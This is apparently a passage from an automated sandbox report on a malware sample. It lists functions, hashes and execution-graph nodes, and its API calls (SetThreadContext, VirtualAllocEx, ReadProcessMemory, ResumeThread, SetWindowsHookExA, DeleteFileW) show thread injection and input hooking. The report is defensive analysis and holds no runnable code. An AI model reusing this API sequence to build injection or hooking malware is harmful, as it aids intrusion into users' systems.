                                                                                                                                • Opcode Fuzzy Hash: f0bb42b1c62323c20c8f2e232bd005804b04cbfe7051cd7cd815dede39136e54
                                                                                                                                • Instruction Fuzzy Hash: DC214AB18003099FCB00DFAAC8807DEBBF5FF48320F50842AE558A7240D778A941CFA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E1B12 Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 509 56e1b12-56e1b63 512 56e1b65-56e1b71 509->512 513 56e1b73-56e1ba3 SetThreadContext 509->513 512->513 515 56e1bac-56e1bdc 513->515 516 56e1ba5-56e1bab 513->516 516->515
                                                                                                                                APIs
                                                                                                                                • SetThreadContext.KERNELBASE(?,00000000), ref: 056E1B96
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ContextThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1591575202-0
                                                                                                                                • Opcode ID: 2005b301efc4494184c5c0168f8b5813c3da8ba07d2264894d23cd628ca28a1d
                                                                                                                                • Instruction ID: 3daba27bc966bad842cd94808710468ee08d831aa1c4c64d4ccb26ff3f7f9b1b
                                                                                                                                • Opcode Fuzzy Hash: 2005b301efc4494184c5c0168f8b5813c3da8ba07d2264894d23cd628ca28a1d
                                                                                                                                • Instruction Fuzzy Hash: 9D213771D003099FCB10DFAAC4847EEBBF4EF99324F54842AD459A7640DB78A945CBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E1B18 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 520 56e1b18-56e1b63 522 56e1b65-56e1b71 520->522 523 56e1b73-56e1ba3 SetThreadContext 520->523 522->523 525 56e1bac-56e1bdc 523->525 526 56e1ba5-56e1bab 523->526 526->525
                                                                                                                                APIs
                                                                                                                                • SetThreadContext.KERNELBASE(?,00000000), ref: 056E1B96
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ContextThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1591575202-0
                                                                                                                                • Opcode ID: 1ba16e9fc175c692d693f200e0586a92541a451df81d64e017f34e57206df278
                                                                                                                                • Instruction ID: 46e0ab1d8dcf404b4ee63423378e943fdd02b6f374577963399da4b8696eb0fc
                                                                                                                                • Opcode Fuzzy Hash: 1ba16e9fc175c692d693f200e0586a92541a451df81d64e017f34e57206df278
                                                                                                                                • Instruction Fuzzy Hash: 18213571D003098FCB10DFAAC4847EEBBF4EF88324F54842AD459A7640DB78A945CFA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E2298 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 530 56e2298-56e2325 ReadProcessMemory 533 56e232e-56e235e 530->533 534 56e2327-56e232d 530->534 534->533
                                                                                                                                APIs
                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056E2318
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                • Opcode ID: b74a46d01178bf3a60eb4707328553508685e33949c40f88606554536f0c1be6
                                                                                                                                • Instruction ID: 7c05ccc4628a3f0e9d6c2050e28817d574e0a3565d7df470bef29c73948053c9
                                                                                                                                • Opcode Fuzzy Hash: b74a46d01178bf3a60eb4707328553508685e33949c40f88606554536f0c1be6
                                                                                                                                • Instruction Fuzzy Hash: 71212AB18013199FCB10DFAAC8806DEBBF5FF48310F50842AE519A7240D7789944CBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 011A2658 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 011A26E2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.385497312.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_11a0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EncodePointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2118026453-0
                                                                                                                                • Opcode ID: 6bcdc300a38b12c1cfbd6e22622f06b16dac128f687f7d7e9ce2d2ee5d3c0533
                                                                                                                                • Instruction ID: f15d9dbb7b2905b3b204cc8d85408692f123a87ae6d27ca2e72f32fdc0223d0b
                                                                                                                                • Opcode Fuzzy Hash: 6bcdc300a38b12c1cfbd6e22622f06b16dac128f687f7d7e9ce2d2ee5d3c0533
                                                                                                                                • Instruction Fuzzy Hash: BF216AB6901305CFDB51DFA9D64838EBFF4FB48324F608429D849AB640E7786545CF61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E1BEA Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056E1C5E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: 81a3485291c1455c862dcf9b7f12b0d55e290830e58e7c11ec3f1988d5c0d291
                                                                                                                                • Instruction ID: 637a22fd45a149bfb335a65fdac25844c7cc7e3fc7fa6bef94f16c4d53877260
                                                                                                                                • Opcode Fuzzy Hash: 81a3485291c1455c862dcf9b7f12b0d55e290830e58e7c11ec3f1988d5c0d291
                                                                                                                                • Instruction Fuzzy Hash: B51126729002099FCB10DFAAC844AEFBFF5EF98324F14842AE555B7650D779A950CBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 011A2668 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 011A26E2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.385497312.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_11a0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EncodePointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2118026453-0
                                                                                                                                • Opcode ID: 2ef99b3caec5e0783890a9f5e6d357d8a602a7a8967ac011f87c22003972b0ae
                                                                                                                                • Instruction ID: 51f06fd05fb7366dbf057b32f84f01a7018d0d993af13000323c1848214866ff
                                                                                                                                • Opcode Fuzzy Hash: 2ef99b3caec5e0783890a9f5e6d357d8a602a7a8967ac011f87c22003972b0ae
                                                                                                                                • Instruction Fuzzy Hash: 45117CB69013098FDB60DF9AD5487DEBFF4FB44324F608029D809A7640E7786545CFA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E1BF0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056E1C5E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: e29232d556a313d60a94d464c10b46a38b68af27e383957521c8667c2312de4b
                                                                                                                                • Instruction ID: cb138b7031cb3fe84f019b4bac299e0751000940b9ece66701202a2760985888
                                                                                                                                • Opcode Fuzzy Hash: e29232d556a313d60a94d464c10b46a38b68af27e383957521c8667c2312de4b
                                                                                                                                • Instruction Fuzzy Hash: 7F1137719002099FCB10DFAAC844AEFBFF5EF88324F14841AE515B7250C779A940CFA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E1A62 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ResumeThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 947044025-0
                                                                                                                                • Opcode ID: 033314f131028a4b42fb10598d06e470b2d21fe2f8a197533f22f89a756c78b6
                                                                                                                                • Instruction ID: ee2077f61474fbd3de70e4d4ecf846361a48f501aab7e350957fd6f40be32015
                                                                                                                                • Opcode Fuzzy Hash: 033314f131028a4b42fb10598d06e470b2d21fe2f8a197533f22f89a756c78b6
                                                                                                                                • Instruction Fuzzy Hash: 9F115B719003098BCB10DFAAC4457EFBBF4EB88324F148429D415B7640CB78A944CB94
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E1A68 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ResumeThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 947044025-0
                                                                                                                                • Opcode ID: 3d12effb1edf5f5ff5af0f211a9d87351bf04b566a78b5d0e004b790cb2e77d8
                                                                                                                                • Instruction ID: 7699feb9483d0bb61afef732fecb70f54188cd1d2857d3618c92b18b7d1eb2f1
                                                                                                                                • Opcode Fuzzy Hash: 3d12effb1edf5f5ff5af0f211a9d87351bf04b566a78b5d0e004b790cb2e77d8
                                                                                                                                • Instruction Fuzzy Hash: 93113AB1D003098BCB10DFAAC4457EFFBF9EF88324F14841AD519A7640DB78A944CBA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                Function 056E2378 Relevance: .1, Instructions: 71COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 51bcce0137274a0d01eb4de7746ea6992d74c1f42b082da18c750694283ef882
                                                                                                                                • Instruction ID: be2d319001a0d070045efb37fa5729a645fefd15f8d9ff330870c6ca786c6b4a
                                                                                                                                • Opcode Fuzzy Hash: 51bcce0137274a0d01eb4de7746ea6992d74c1f42b082da18c750694283ef882
                                                                                                                                • Instruction Fuzzy Hash: 9B316C75D06628CBEB68CF2BC815799BAF7AFC9300F14C1BA840DA6254DB740A86CF55
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E2369 Relevance: .1, Instructions: 62COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 658e152efd754b56bb0f7d8ba581690d8b636b2319857d76fb888d87e8735af7
                                                                                                                                • Instruction ID: fe8f4391b81ae2a3309ed5805af75f023adf55b94f4b76c856f7eac7687c2ee1
                                                                                                                                • Opcode Fuzzy Hash: 658e152efd754b56bb0f7d8ba581690d8b636b2319857d76fb888d87e8735af7
                                                                                                                                • Instruction Fuzzy Hash: 8B21AF75D156288BEB68CF2B8C45799FBF7AFC8200F14C1F9881CA6214EA3009868F50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E5A70 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5AD7
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5B1C
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5B87
                                                                                                                                • RtlDecodePointer.NTDLL(-000000FC), ref: 056E5BD1
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5C11
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5C57
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5C9B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: b15667a3885becc9297bd48479d8b4b73095ffb42ea375c6180aa109f325de18
                                                                                                                                • Instruction ID: bdb7fa5f98c1ca4b36a2760ea732638aae91dad5356845cd601e86ab819268a9
                                                                                                                                • Opcode Fuzzy Hash: b15667a3885becc9297bd48479d8b4b73095ffb42ea375c6180aa109f325de18
                                                                                                                                • Instruction Fuzzy Hash: D681E474C062489FDB10CFA8E19979CFBF5BB28318F24814AE85AB7790C7795885CF61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E5710 Relevance: 10.6, APIs: 7, Instructions: 146COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E576C
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E57AB
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5812
                                                                                                                                • RtlDecodePointer.NTDLL(00000000), ref: 056E584E
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5888
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E58C8
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5906
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: d7c24e8ec7f06ae0d16028d95f81d0945e6cf82ac8449caeca1b9875d66a89fe
                                                                                                                                • Instruction ID: 5b521ac2577c67bfe595a065aed480ea122753a45523fecb4e90e585625385ba
                                                                                                                                • Opcode Fuzzy Hash: d7c24e8ec7f06ae0d16028d95f81d0945e6cf82ac8449caeca1b9875d66a89fe
                                                                                                                                • Instruction Fuzzy Hash: F5613AB1C06359CFDB619F9AC48C3DEBBF0BB18319F108519D46A67680D7781585CFA2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E5DE8 Relevance: 10.6, APIs: 7, Instructions: 146COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5E44
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5E83
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5EEA
                                                                                                                                • RtlDecodePointer.NTDLL(00000000), ref: 056E5F26
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5F60
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5FA0
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5FDE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: 7c9233b84e859242e9e861ba6d4a9ab5913f1da2a776641cb3606ab20cf36615
                                                                                                                                • Instruction ID: 0b10a1e5d3767b27b542497a42498d4976eebb4f6a68140aebcfbc67267f505e
                                                                                                                                • Opcode Fuzzy Hash: 7c9233b84e859242e9e861ba6d4a9ab5913f1da2a776641cb3606ab20cf36615
                                                                                                                                • Instruction Fuzzy Hash: B06136B0C063598FDF21CFA9D54879EBFF4BB28319F14850AE45AA7A80C3785585CF61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E5701 Relevance: 10.6, APIs: 7, Instructions: 140COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E576C
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E57AB
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5812
                                                                                                                                • RtlDecodePointer.NTDLL(00000000), ref: 056E584E
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5888
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E58C8
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5906
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: 5e4376f30d9c1d48a9aff209bedbf7cdb0c660a797ffc5f3cc4e964c2dbbce24
                                                                                                                                • Instruction ID: 856fcd1e992e807e593e12ac7fc8cbd13f36d8715f1b11c84580577c415a5313
                                                                                                                                • Opcode Fuzzy Hash: 5e4376f30d9c1d48a9aff209bedbf7cdb0c660a797ffc5f3cc4e964c2dbbce24
                                                                                                                                • Instruction Fuzzy Hash: FC6139B0C06359CFDB619F9AC58C39EBFF0BB18318F108519D46A67680D3785585CFA6
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E5DE2 Relevance: 10.6, APIs: 7, Instructions: 137COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5E44
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5E83
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5EEA
                                                                                                                                • RtlDecodePointer.NTDLL(00000000), ref: 056E5F26
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5F60
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5FA0
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5FDE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: 35094f0781f42f26cc4fc684098a10ed3b9a4cf83bc7aa1660bfa35cadca462f
                                                                                                                                • Instruction ID: dccd73b7aace79b2aaee611e012f5c909943a1d656c892fda2b525f5c2ef8b1d
                                                                                                                                • Opcode Fuzzy Hash: 35094f0781f42f26cc4fc684098a10ed3b9a4cf83bc7aa1660bfa35cadca462f
                                                                                                                                • Instruction Fuzzy Hash: CB5115B0C0635A8FDF218FA9D54879EBFF4BB28319F14850AE456A7A80C3785585CF61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E603A Relevance: 7.6, APIs: 5, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5EEA
                                                                                                                                • RtlDecodePointer.NTDLL(00000000), ref: 056E5F26
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5F60
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5FA0
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5FDE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: 3e104980d4f14e4c340f620fbe2755469207aa7ff62945373cfccabe1fe32244
                                                                                                                                • Instruction ID: 8afdf231ad8779c86db23cfd8fdad3f6dfbc07e996b24fd04bcb339fa4ca44ca
                                                                                                                                • Opcode Fuzzy Hash: 3e104980d4f14e4c340f620fbe2755469207aa7ff62945373cfccabe1fe32244
                                                                                                                                • Instruction Fuzzy Hash: 24417BB0C063568BDF218FA9D5483AEBFF4BB24309F20451AE446A6B80C7785885CFA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:15.5%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0.6%
                                                                                                                                Total number of Nodes:474
                                                                                                                                Total number of Limit Nodes:58
                                                                                                                                execution_graph 34808 6983058 34810 698309c SetWindowsHookExA 34808->34810 34811 69830e2 34810->34811 35108 1235ad0 35109 1235aee 35108->35109 35112 1234954 35109->35112 35111 1235b25 35114 12375f0 LoadLibraryA 35112->35114 35115 12376e9 35114->35115 34812 6c47c80 DuplicateHandle 34813 6c47d16 34812->34813 34814 6c40910 34816 6c40915 34814->34816 34815 6c40933 34816->34815 34821 6c40c98 34816->34821 34826 6c40ddb 34816->34826 34831 6c40e19 34816->34831 34836 6c40e78 34816->34836 34823 6c40caa 34821->34823 34822 6c40f1a 34822->34816 34823->34822 34841 6c449f0 34823->34841 34845 6c4496f 34823->34845 34828 6c40de0 34826->34828 34827 6c40f1a 34827->34816 34829 6c449f0 DeleteFileW 34828->34829 34830 6c4496f DeleteFileW 34828->34830 34829->34827 34830->34827 34833 6c40e1e 34831->34833 34832 6c40f1a 34832->34816 34834 6c449f0 DeleteFileW 34833->34834 34835 6c4496f DeleteFileW 34833->34835 34834->34832 34835->34832 34837 6c40e7d 34836->34837 34839 6c449f0 DeleteFileW 34837->34839 34840 6c4496f DeleteFileW 34837->34840 34838 6c40f1a 34838->34816 34839->34838 34840->34838 34843 6c44a00 34841->34843 34842 6c44a38 34842->34822 34843->34842 34850 6c422a4 34843->34850 34846 6c44980 34845->34846 34848 6c44985 34845->34848 34846->34822 34847 6c449a9 34847->34822 34848->34847 34849 6c422a4 DeleteFileW 34848->34849 34849->34847 34851 6c422a9 DeleteFileW 34850->34851 34853 6c4521f 34851->34853 34853->34842 34854 6981180 34857 123dfa1 34854->34857 34855 698119e 34858 123df5e 34857->34858 34859 123e001 34857->34859 34858->34855 34860 1230b58 GetUserNameW GetUserNameW DeleteFileW KiUserCallbackDispatcher 34859->34860 34861 123e141 34859->34861 34860->34859 34861->34855 35116 6980161 35120 6980063 35116->35120 35117 69805da 35118 69805ea OleInitialize 35119 6980664 35118->35119 35120->35117 35120->35118 34866 1230448 34867 123044d 34866->34867 34868 123048f 34867->34868 34874 6985e7f 34867->34874 34878 6985e90 34867->34878 34882 1230b48 34867->34882 34888 1230e20 34867->34888 34894 1230b58 34867->34894 34875 6985e9f 34874->34875 34900 6985524 34875->34900 34879 6985e9f 34878->34879 34880 6985524 5 API calls 34879->34880 34881 6985ebf 34880->34881 34881->34867 34884 1230b4b 34882->34884 34883 1230dfe 34883->34867 34884->34883 34976 123100a 34884->34976 34986 6c40006 34884->34986 34993 6c40040 34884->34993 34890 1230e26 34888->34890 34889 1230fff 34889->34867 34890->34889 34891 123100a 4 API calls 34890->34891 34892 6c40006 2 API calls 34890->34892 34893 6c40040 2 API calls 34890->34893 34891->34890 34892->34890 34893->34890 34896 1230b78 34894->34896 34895 1230dfe 34895->34867 34896->34895 34897 123100a 4 API calls 34896->34897 34898 6c40006 2 API calls 34896->34898 34899 6c40040 2 API calls 34896->34899 34897->34896 34898->34896 34899->34896 34901 698552f 34900->34901 34904 69855c0 34901->34904 34903 6985f96 34905 69855cb 34904->34905 34906 698669d 34905->34906 34908 6988358 34905->34908 34906->34903 34909 6988379 34908->34909 34910 698839d 34909->34910 34913 69884f7 34909->34913 34917 6988508 34909->34917 34910->34906 34914 6988508 34913->34914 34916 698854e 34914->34916 34921 6987848 34914->34921 34916->34910 34918 6988515 34917->34918 34919 698854e 34918->34919 34920 6987848 5 API calls 34918->34920 34919->34910 34920->34919 34922 6987853 34921->34922 34924 69885c0 34922->34924 34925 698787c 34922->34925 34924->34924 34926 6987887 34925->34926 34932 698788c 34926->34932 34928 698862f 34936 698d528 34928->34936 34944 698d510 34928->34944 34929 6988668 34929->34924 34933 6987897 34932->34933 34934 6988964 34933->34934 34935 6988358 5 API calls 34933->34935 34934->34928 34935->34934 34938 698d64a 34936->34938 34939 698d559 34936->34939 34937 698d565 34937->34929 34938->34929 34939->34937 34951 698d790 34939->34951 34954 698d782 34939->34954 34940 698d5a5 34958 6c40948 34940->34958 34946 698d528 34944->34946 34945 698d565 34945->34929 34946->34945 34948 698d790 4 API calls 34946->34948 34949 698d782 4 API calls 34946->34949 34947 698d5a5 34950 6c40948 DeleteFileW 34947->34950 34948->34947 34949->34947 34950->34945 34962 698d7cf 34951->34962 34952 698d79a 34952->34940 34955 698d790 34954->34955 34957 698d7cf 4 API calls 34955->34957 34956 698d79a 34956->34940 34957->34956 34960 6c40972 34958->34960 34959 6c40a19 34959->34959 34960->34959 34961 6c4496f DeleteFileW 34960->34961 34961->34959 34972 6c418a0 GetModuleHandleW 34962->34972 34973 6c4186f GetModuleHandleW 34962->34973 34963 698d7e3 34965 698d7fb 34963->34965 34974 698d7cf LoadLibraryExW GetModuleHandleW GetModuleHandleW 34963->34974 34975 698d9b0 LoadLibraryExW 34963->34975 34964 698d7f3 34964->34965 34966 698da22 LoadLibraryExW 34964->34966 34968 698d9aa 34964->34968 34965->34952 34970 698da89 34966->34970 34969 698d9e9 34968->34969 34971 698ca10 